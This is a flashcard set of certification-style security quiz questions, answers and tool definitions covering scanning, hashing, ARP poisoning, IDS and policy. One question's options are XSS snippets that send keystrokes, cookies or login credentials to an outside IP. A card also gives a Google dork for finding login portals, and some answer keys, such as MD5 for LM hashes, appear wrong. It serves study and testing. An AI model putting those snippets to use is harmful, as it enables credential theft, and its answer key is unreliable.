You have a large packet capture file in Wireshark to review. You want to filter traffic to show all packets with an IP address of 192.168.22.5 that contain the string HR_admin. Which of the following filters would accomplish this task? A. ip.addr==192.168.22.5 && tcp contains HR_admin B. ip.addr 192.168.22.5 && "HR_admin" C. ip.addr 192.168.22.5 && tcp string == HR_admin D. ip.addr==192.168.22.5 + tcp contains tide

A. Your IDLE scan results will not be useful to you.

You have a zombie system ready and begin an IDLE scan. As the scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean? A. Your IDLE scan results will not be useful to you. B. The zombie system is a honeypot. C. There is a misbehaving firewall between you and the zombie machine. D. This is an expected result during an IDLE scan.

E)Acquisition

You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase? A)Evaluation B)Identification C)Analyzing D)Generating reports E)Acquisition

C)ISO/IEC 27001:2013

You have been hired as a consultant for a company. You have been asked to provide guidance on establishing, implementing, maintaining, and improving their information security management system. They ask that you provide recommendations based on industry standards. Which of the following standard should you use? A)SOX B)PCI-DSS C)ISO/IEC 27001:2013 D)DMCA

A)Medical

You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you? A)Medical B)Government C)Financial D)Publicly traded

C)Star

You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented? A)Bus B)Ring C)Star D)Mesh

D)Collecting system information

You have been hired as an ethical hacker by your company. You are currently involved in footprinting from outside your company's network. During the most recent analysis, you obtain SNMP information, user, computer and group names and user passwords. Which footprinting objective are you completing? A)Collecting network information B)Collecting organizational information C)Collecting security information D)Collecting system information

A)End-user security training

You have conducted a technical assessment of the network by attempting a number of different social engineering attacks on the network. Which of the following processes is MOST LIKELY to be altered as a result? A)End-user security training B)Physical security C)Password policies D)Access control management

A)Man-in-the-middle attacks

You have decided to implement both client and server PKI certificates to be used by all systems when authenticating to the corporate web site. What type of attack can this help prevent? A)Man-in-the-middle attacks B)Rogue access points C)Smurf attacks D)SYN floods

B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network.

You have recently discovered that an attacker has successfully carried out a session sniffing attack. Which description best describes this attack? A)The attacker masqueraded as a trusted host by using an IP address from within the network being attacked. B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network. C)The attacker inserted malicious coding into a link that appeared to be from a trustworthy source. D)The attacker added SQL code to a Web form input box to gain access to resources or make changes to data.

D)Firewall evasion

You have recently discovered that an attacker used the tcp-over-dns tool on your company's network. What is this tool meant to accomplish in an attack? A)Packet sniffing B)Port scanning C)Vulnerability scanning D)Firewall evasion

A) MD5

You have successfully captured an LM Manager SAM file from an older Windows machine. Which encryption algorithm is used by LM Manager on Windows 2000 SAM file entries? A) MD5 B) MD4 C) SSL D) DES

B) If the right side of the hash ends with 1404EE, the password is less than eight characters

You have successfully copied the LM hash values of passwords on the machine. Which of the following is true statement? A) If the left side of the hash begins with the 1404EE, the password is less than either characters B) If the right side of the hash ends with 1404EE, the password is less than eight characters C) There is no way to tell whether passwords are less than eight characters, you can't reverse hashes D) There is no way to tell whether passwords are less than eight characters; each hash is always 32 long

B. ARP poisoning to allow you to see messages from Host A to Host B

You have successfully tapped into a network subnet of your target organization. You begin an attack by learning all significant MAC addresses on the subnet. After some time, you decide to intercept messages between two hosts. You begin by sending broadcast messages to Host A showing your MAC address as belonging to Host B. Simultaneously, you send messages to Host B showing your MAC address as belonging to Host A. What is being accomplished here? A. ARP poisoning to allow you to see all messages from either host without interrupting their communications process B. ARP poisoning to allow you to see messages from Host A to Host B C. ARP poisoning to allow you to see messages from Host B to Host A D. ARP poisoning to allow you to see messages from Host A destined to any address E. ARP poisoning to allow you to see messages from Host B destined to any address.

B)File and folder encryption

You manage a network that contains Windows Server 2008 and Windows Vista computers. You have several laptops that are issued to employees when they are working remotely. You decide to implement EFS on the laptop computers. What does this provide? A)Automatic error recovery B)File and folder encryption C)Drive encryption D)File-level security

B)Polymorphic virus

Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application? A)Stealth virus B)Polymorphic virus C)Fast-infecting virus D)Tunneling virus

D)The TTL value is 1, and the destination host is several hops away.

You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur? A)The TTL value is 2, and the source host is one hop away. B)The TTL value is 2, and the destination host is one hop away. C)The TTL value is 1, and the source host is several hops away. D)The TTL value is 1, and the destination host is several hops away.

B)Enumeration the alive systems in first ten IP addresses in the 192.168.1.0 network via ICMP

You run the following command on a Windows computer: FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply" What is the result? A)Enumeration of the alive systems in the last ten IP addresses in the 192.168.1.0 network via ICMP B)Enumeration the alive systems in first ten IP addresses in the 192.168.1.0 network via ICMP C)Enumeration all the dead systems in the 192.168.1.0 network via ICMP D)Enumeration of all the alive systems in the 192.168.1.0 network via ICMP

B) TCPflow

You want to extract the Application Layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) NMAP

B) TCPflow

You want to extract the Application layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) Nmap

C. nmap -sP 192.168.1.0/24

You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option? A. nmap 192.168.1.0/24 B. nmap -sT 192.168.1.0/24 C. nmap -sP 192.168.1.0/24 D. nmap -P0 192.168.1.0/24

A. Telnet 168.15.22.4 80 C. nc -v -n 168.15.22.4 80

You want to perform banner grabbing against a machine (168.15.22.4) you suspect as being a web server. Assuming you have the correct tools installed, which of the following command-line entries will successfully perform a banner grab? (Choose all that apply.) A. Telnet 168.15.22.4 80 B. Telnet 80 168.15.22.4 C. nc -v -n 168.15.22.4 80 D. nc -v -n 80 168.15.22.4

C. nmap -sS targetIPaddress

You want to run a scan against a target network. You're concerned about it being a reliable scan, with legitimate results, but want to take steps to ensure it is as stealthy as possible. Which scan type is best in this situation? A. nmap -sN targetIPaddress B. nmap -sO targetIPaddress C. nmap -sS targetIPaddress D. nmap -sT targetIPaddress

C)PPTP

You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose? A)GRE B)IPSec C)PPTP D)L2TP

B. Closed

You're running an IDLE scan and send the first packet to the target machine. Next, the SYN/ACK packet is sent to the zombie. The IPID on the return packet from the zombie is 36754. If the starting was 36753, in what state is the port on the target machine? A. Open B. Closed C. Unknown D. None of the above.

E. Anomaly based

Your IDS sits on the network perimeter and has been analyzing traffic for a couple of weeks. On arrival one morning, you find the IDS has alerted on a spike in network traffic late the previous evening. Which type of IDS are you using? A. Stateful B. Snort C. Passive D. Signature based E. Anomaly based

D)Limit interactive logon privileges

Your IT security team defends against privilege escalation with the following countermeasures: -Encryption for sensitive company data -Services run as unprivileged accounts -Multi-factor authentication and authorization Which additional countermeasure would BEST enhance the current defense? A)Patch critical systems regularly B)Implement privilege separation for custom programs C)Perform debugging during stress tests D)Limit interactive logon privileges

D) Cygwin

Your client has some Unix tools he wants to run on a Windows machine. A friend suggests a well known Unix subsystem that can run on Windows for just such a purpose. What is this subsystem called? A) Armitage B) Metasploit C) LILO D) Cygwin

A. Information Security Policy

Your company has a document that spells out exactly what employees are allowed to do on their computer systems. It also defines what is prohibited and what consequences await those who break the rules. A copy of this document is signed by all employees prior to their network access. Which of the following best describes this policy? A. Information Security Policy B. Special Access Policy C. Information Audit Policy D. Network Connection Policy

C)Nessus

Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement. Which tool should you use? A)Wireshark B)Nmap C)Nessus D)Snort

A)ADS Spy B)streams.exe E)SFind

Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.) A)ADS Spy B)streams.exe C)AdsCheck.exe D)ADMutate E)SFind

B)RA

Your company has a public key infrastructure (PKI) implemented to issue digital certificates to users. Users start reporting problems with receiving new certificates. You suspect that the entity responsible for receiving the subject's request and verifying the subject's identity is down. Which entity should you check? A)VA B)RA C)OCSP D)CA

C)Detect and analyze

Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred? A)Classify and prioritize B)Notify C)Detect and analyze D)Contain

C)White hat

Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position? A)Gray hat B)Black hat C)White hat D)Script kiddie

Windows Task Scheduler

___ along with utilities such as 'at' and 'schtasks' can be used to schedule programs that can be executed at a specific date and time

B)External, host-based vulnerability scan

Your company has hired a third party to identify vulnerabilities on the network. Recently, one of the contractors performed a vulnerability scan over the Internet that identified the vulnerabilities on the internal Web server. Which type of vulnerability scan occurred? A)Internal, host-based vulnerability scan B)External, host-based vulnerability scan C)External, application vulnerability scan D)Internal, application vulnerability scan

B)Snort

Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use? A)TCPDump B)Snort C)AirSnort D)Wireshark

A)ESXi C)Hyper-V

Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software are vulnerable to a VM-level attack? (Choose all that apply.) A)ESXi B)Cygwin C)Hyper-V D)XCode E)Wine

D)It will track changes to the files on the server.

Your company has just installed a new Linux file server. You decide in install Tripwire to provide system integrity verification on the file server. Which function will this provide? A)It will provide security checks, including file permissions. B)It will test the system for vulnerabilities. C)It will recover encryption keys. D)It will track changes to the files on the server.

A)HR department

Your company has recently adopted several new security policies. Most of the policies just affect the employees in the IT department. However, one of the policies affects employees in the accounting department. Which entity is responsible for making the employees aware of the new security policies? A)HR department B)IT department C)Departmental managers D)Chief security officer

D)AirSnort

Your company has recently launched several wireless networks at its primary location. Contrary to your suggestions, all the wireless networks use WEP encryption keys. You are concerned that hackers will easily obtain the WEP encryption key. Which tool should you use to demonstrate this vulnerability? A)Netstumbler B)Wireshark C)Nessus D)AirSnort

B)802.1x EAP packets are captured for later replay.

Your company has several wireless networks implemented on its large campus. 802.1x authentication is deployed for all wireless network through a RADIUS server. Recently, you discovered that one of the wireless networks was the victim of an Extensible AP Replay attack. What occurs during this attack? A)A valid 802.1x EAP exchange is observed so that the attacker can later send a forged EAP-Failure message. B)802.1x EAP packets are captured for later replay. C)User credentials are recovered from captured 802.1x LEAP packets using a dictionary attack tool. D)User identities are captured from cleartext 802.1x Identity Response packets.

Signature-based NIDS

Your company implements two Network Intrusion Detection Systems (NIDS): one anomaly-based and one signature-based. It also implements two Network Intrusion Protection Systems (NIPS): one anomaly-based and one stateful protocol-based. Your company employs an ethical hacker who uses ADMutate to disguise a buffer overflow attack. The attack is attempting to breach the network. Which system is most likely being targeted? A)Signature-based NIDS B)Stateful protocol-based NIPS C)Anomaly-based NIPS D)Anomaly-based NIDS

B)Stateful inspection firewall

Your company needs to implement a firewall. It must be able to discard TCP segments arriving at an open port when they have the header flag of FIN enabled, provided they are the first packet received from the source. Which type of firewall should be implemented? A)Packet filter firewall B)Stateful inspection firewall C)Circuit level firewall D)Web application firewall

C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); };

Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack? A)window.setInterval(function() { new Image().src = 'http://5.45.64.15/index.php?' + Math.floor(Math.random() * 1000) + '=data'; }, 10); B)window.onload = function() { window.location = 'http://5.45.64.15/index.php?data=' + document.cookie; }; C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); }; D)document.forms[0].onsubmit = function() { Window.location = 'http://5.45.64.15/index.php?data=' document.forms[0].username.value + '/' + document.forms[0].password.value; };

B)Password, smart card, retina scan

Your company wants to implement a three-factor access control system. Which of the following would qualify for this implementation? A)PIN, smart card, hardware token B)Password, smart card, retina scan C)PIN, password, smart card D)Fingerprint scan, smart card, retina scan

C)3DES

Your company wants to use symmetric key cryptography in an application it is developing. Which of the following algorithms could be used? A)Diffie-Hellman B)ElGamal C)3DES D)RSA

D)Hiding file data in existing files

Your company's network consists of primarily Windows client and server computers. Recently, management has become concerned with alternate data streams when using NTFS in Windows. What are alternate data streams in Windows? A)Data concealed within another file, message, image, or video B)Automatic file-level encryption C)Optional hard disk-level encryption D)Hiding file data in existing files

C)Go to archive.org

Your company's web site is updated on a regular basis. Over the past three years, the web site has undergone four major updates in response to security issues. One of those major updates was to address a JavaScript vulnerability that allowed SQL injection attacks to occur. A new developer has requested to go back and see the code for the JavaScript vulnerability. However, he discovers that there is retention of the code for the previous web site versions. How can the developer go back and review the code? A)Review the logs for the web server B)Go to whois.org C)Go to archive.org D)It is not possible to retrieve the old code

Authentication Authorization Accounting (AAA)

___ confirms the identity of the user or device. ___ determines the privileges (rights) of the user or device. ___ records the access attempts, both successful and unsuccessful.

Plist files

___ in MacOS and OS X describe when programs should execute, executable file path, program parameters, required OS permissions, etc.

A)Rolling, displays repeatedly until the script process is killed

Your manager is testing your understanding of the PHP language. She provides you the following code: <?php for (;;) { print "Rolling,"; } ?> She asks you to describe the output. Which description is correct? A)Rolling, displays repeatedly until the script process is killed B)Rolling, displays once C)"Rolling,"; displays repeatedly until the script host automatically reboots D)"Rolling,"; "Rolling,"; displays every 30 seconds E)"Rolling,"; displays once F)Error message displays G)Rolling,Rolling, displays every 30 milliseconds

D. 0.20

Your network contains certain servers that typically fail once every five years. The total cost of one of these servers is $1000. Server technicians are paid $40 per hour, and a typical replacement requires two hours. Ten employees, earning an average of $20 per hour, rely on these servers, and even one of them going down puts the whole group in a wait state until it's brought back up. Which of the following represents the ARO for a server? A. $296 B. $1480 C. $1000 D. 0.20

C)Snort

Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend? A)Nmap B)Nessus C)Snort D)Foundstone

C)Denial of service

Your network just suffered an attack. Nothing was stolen or deleted, but a key file server was unresponsive to users for about 8 hours. What kind of attack did you suffer? A)Social engineering B)IP spoofing C)Denial of service D)Brute force

B)It will allow the scan to evade your border sensor

Your organization has contracted with a third party to perform a penetration test. You have been allowed to observe and ask questions as the test proceeds. At one point you see that the tester is performing a scan of the network from the Internet and tunneling the scan through SSH. What is the purpose of this extra step? A)The scan will complete faster B)It will allow the scan to evade your border sensor C)The scan will gather more complete information D)It will scan devices that allow SSH connections

C)Non-repudiation

Your organization has decided to implement IPSec. One of the important functions you want to implement is its ability to prove where a message originates. Which feature of IPsec provides this function? A)Authentication B)Confidentiality C)Non-repudiation D)Integrity

A)Mandatory access control

Your organization has implemented a two-factor authentication system that includes usernames, passwords, and smart cards. Users are assigned classifications, and access to resources is granted based on the resource's security label. Which access control mechanism does this implement? A)Mandatory access control B)Detective access control C)Role-based access control D)Physical access control

D)A sniffer used to capture password hashes

Your organization implements a network protocol that uses SMB signing. Which attack does this protect against? A)A port scanner used to discover open ports B)A network mapper used to discover which OSs are used on the network C)A vulnerability scanner used to discover network vulnerabilities D)A sniffer used to capture password hashes

D)Vulnerability protection system

Your organization is concerned that patches and updates aren't being deployed in a timely manner. You need to deploy a system that will help with this problem. Which type of system should you deploy? A)Intrusion prevention system B)Network access control C)Network address translation D)Vulnerability protection system

B. BIA (Business Impact Analysis)

Your organization is planning for the future and is identifying the systems and processes critical for their continued operation. Which of the following best describes this effort? A. BCP B. BIA C. DRP D. ALE

A)Immediately

Your organization processes credit card payments and adheres to the requirements of the Payment Card Industry Data Security Standard. Recently, you upgraded the card processing software to a new version. When are you required by the PCI-DSS to perform external and internal penetration testing? A)Immediately B)Within the next year C)At the next yearly test D)Within the next 6 months

B)Privilege escalation

Your security team has implemented the following controls: Sensitive data is encrypted Interactive logon privileges are restricted Services run as unprivileged accounts Users and applications operate with the least privileges Which of the following vulnerabilities are these controls designed to mitigate? A)DoS attacks B)Privilege escalation C)Phishing attacks D)Trojan software

A)Digital signature B)Private key

Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.) A)Digital signature B)Private key C)Public key D)Digital certificate E)Secure web gateway

D. TCP over DNS

Your target subnet is protected by a firewalled DMZ. Reconnaissance shows the external firewall passes some traffic from external to internal, but blocks most communications. HTTP traffic to a web server in the DMZ, which answers to www.somebiz.com, is allowed, along with standard traffic such as DNS queries. Which of the following may provide a method to evade the firewall's protection? A. An ACK scan B. Firewalking C. False positive flooding D. TCP over DNS

D) Fragroute

Your target uses a signature based IDS. Which of the following allows an attacker to intentionally craft packets that will eventually by correctly assembled by the target, thereby passing through the IDS undetected? A) Defrag B) Tcpfrag C) Netcat D) Fragroute

C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file.

Your team is hired to test a business named Matt's Bait 'n Tackle Shop (domain name mattsBTshop.com). A team member runs the following command: metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html Which of the following best describes what the team member is attempting to do? A. Extract metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format. B. Extract metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format. C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file. D. Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com.

WebSite-Watcher

allows you to automatically check web pages for updates and changes

eMailTrackerPro

analyzes email headers and reveals information such as sender's geographical location, IP address, etc.

The Onion Routing (Tor)

basically works by installing a small client on the machine, which then gets a list of other clients running (this program) from a directory server. The client then bounces Internet requests across random clients to the destination.

PsPasswd

changes account passwords

Social engineers

depend on the fact that people are unaware of their valuable information and are careless about protecting it

1. Know the security posture (footprinting helps make this clear). 2. Reduce the focus area (network range, number of targers, and so on). 3. Identify vulnerabilities 4. Draw a network map.

describe four main focuses and benefits of footprinting

TCP Connect Scan

detects when a port is open by completing the three-way handshake

PsGetSid

displays the SID of a computer or a user

PsLogList

dump event log records

active footprinting

effort is one that requires the attacker to touch the device, network, or resource

state-sponsored hacker

employed by a government

Colasoft Packet Builder

enables creating custom network packets to audit networks for various attacks

SolarWinds Engineer Toolset's Ping Sweep

enables scanning a range of IP addresses to identify which IP addresses are in use and which ones are currently free. It also performs reverse DNS lookup

PsExec

execute processes remotely

security identifier (SID)

identifies user, group, and computer accounts and follows a specific format.

Vulnerability Scanning

identifies vulnerabilities and weaknesses of a system and network in order to determine how a system can be exploited

VoIP login portals

inurl:8080 intitle:"login" intext:"UserLogin" "English"

Passive Reconnaissance

involves acquiring information without directly interacting with the target.

Passive reconnaissance

involves gathering information about your target without their knowledge.

Active reconnaissance

involves interacting with the target directly by any means

Stealth scan

involves resetting the TCP connection between client and server abruptly before completion of three-way handshake signals making the connection half open

Ping scan

involves sending ICMP ECHO requests to a host. If the host is live, it will return an ICMP ECHO reply

Recon-ng

is a Web Reconnaissance framework with independent modules, database interaction, built in convenience functions, interactive help, and command completion, that provides an environment in which open source web-based reconnaissance can be conducted

Enterprise Information Security Architecture (EISA)

is a collection of requirements and processes that help determine how an organization's information systems are built and how they work.

DNS records

provide important information about location and type of servers

Baselines

provide the minimum security level necessary.

DNS (Domain Naming System)

provides a name-to-IP-address (and vice versa) mapping service, allowing us to type in a name for a resource as opposed to its address.

SNMPv3

provides encryption for the strings as well as other improvements and options.

The Application layer

provides services to applications, which allow them access to the network. Protocols such as FTP and SMTP reside here.

IP spoofing

refers to changing source IP addresses so that the attack appears to be come from someone else

Google hacking

refers to creating complex search queries in order to extract sensitive or hidden information

Hacking

refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to the system resources

passive footprinting

refers to measures to collect information from publicly accessible sources

Spam/Email Steganography

refers to the technique of sending secret messages by hiding them in spam/email messages

information warfare (InfoWar)

refers to the use of information and communication technologies (ICT) to take competitive advantages over an opponent

ARP (Address Resolution Protocol)

resolve IP address to machine (MAC) addresses.

802.11b

runs at up to 11 Mbps at 2.4 GHz

802.11g

runs at up to 54 Mbps at 2.4 GHz

Censys

search engine enables researchers to ask questions about the hosts and networks that compose the Internet

SHODAN

search engine lets you find connected devices (routers, servers, IoT, etc.) using a variety of filters

Scanning and enumeration

security professionals take the information they gathered in recon and actively apply tools and techniques to gather more in-depth information on the targets.

finance.google.com

shows you company news releases on a timeline of its stock performance--in effect, showing you when key milestones occurred can be found where?

Masking and Filtering

techniques hide data using a method similar to watermarks on actual paper and it can be done by modifying the luminance of parts of the image


Related study sets

E-Commerce vocabulary: Chapter 2

View Set

Practice Test for NBCOT (TMPOT version)

View Set

Plastic and its effect on the ocean

View Set